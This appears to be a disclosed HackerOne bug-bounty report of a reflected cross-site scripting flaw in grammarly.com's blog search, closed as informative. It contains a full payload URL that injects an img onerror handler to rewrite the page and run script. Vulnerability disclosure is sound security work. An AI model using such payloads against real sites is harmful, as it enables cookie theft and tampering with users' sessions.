Reflected Cross Site Scripting (XSS)

Disclosed: 2019-04-30 06:10:04 By sarmadkhan To grammarly
Medium
Vulnerability Details
hi there, here is the link that fired XSS https://www.grammarly.com/blog/search/"><img src=x onerror=document.body.innerHTML=location.hash>#<img src=x onerror=prompt(1)> ## Impact stealing cookies stealing data etc.
Actions
View on HackerOne
Report Stats
  • Report ID: 435144
  • State: Closed
  • Substate: informative
  • Upvotes: 10
Share this report